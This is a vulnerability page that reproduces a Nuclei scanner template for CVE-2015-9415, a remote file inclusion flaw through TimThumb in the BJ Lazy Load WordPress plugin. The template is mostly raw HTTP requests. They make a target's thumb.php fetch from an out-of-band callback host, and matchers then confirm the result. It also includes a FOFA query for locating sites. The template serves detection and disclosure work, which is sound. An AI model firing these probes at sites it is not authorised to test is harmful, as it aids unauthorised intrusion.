CVE-2015-9415: BJ Lazy Load (Timthumb) <= 0.7.5 - Remote File Inclusion

漏洞描述

The BJ Lazy Load plugin v0.7.5 for WordPress has a Remote File Inclusion vulnerability via TimThumb.

PoC代码[已公开]

id: CVE-2015-9415

info:
  name: BJ Lazy Load (Timthumb) <= 0.7.5 - Remote File Inclusion
  author: s4e-io
  severity: high
  description: |
    The BJ Lazy Load plugin v0.7.5 for WordPress has a Remote File Inclusion vulnerability via TimThumb.
  remediation: Fixed in 1.0
  reference:
    - https://wpscan.com/vulnerability/c15aef94-822d-40eb-80a6-e4a0611cb5c1/
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bj-lazy-load/bj-lazy-load-10-remote-file-inclusion-via-timthumb
    - https://nvd.nist.gov/vuln/detail/CVE-2015-9415
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
    cvss-score: 7.5
    cve-id: CVE-2015-9415
    cwe-id: CWE-20
    epss-score: 0.19337
    epss-percentile: 0.95118
    cpe: cpe:2.3:a:angrycreative:bj_lazy_load:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: angrycreative
    product: bj_lazy_load
    framework: wordpress
    fofa-query: body="/wp-content/plugins/bj-lazy-load"
  tags: cve,cve2015,wp,wp-plugin,wordpress,wpscan,bj-lazy-load,rfi,vkev,vuln

flow: http(1) || http(2)

http:
  - raw:
      - | #if set true in bj-lazy-load/inc/timthumb.php ALLOW_ALL_EXTERNAL_SITES option
        GET /wp-content/plugins/bj-lazy-load/thumb.php?src=http://{{interactsh-url}}/{{rand_base(16)}}.jpg HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 400'
          - 'contains(body, "TimThumb Error")'
          - 'contains(interactsh_protocol, "http")'
        condition: and

  - raw:
      - | #default plugin settings
        GET /wp-content/plugins/bj-lazy-load/thumb.php?src=http://img.youtube.com/{{rand_base(16)}}.jpg HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "gd-jpeg")'
          - 'contains(content_type, "image/jpeg")'
        condition: and
# digest: 4a0a00473045022100835e0411e960b97034e80c31e626647b4fc16a371c362533b942910850a4f08f02201be7a8fcd864c3d9c497571fe73350a3cd896175c078e00b5187b56741047125:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2015/CVE-2015-9415.yaml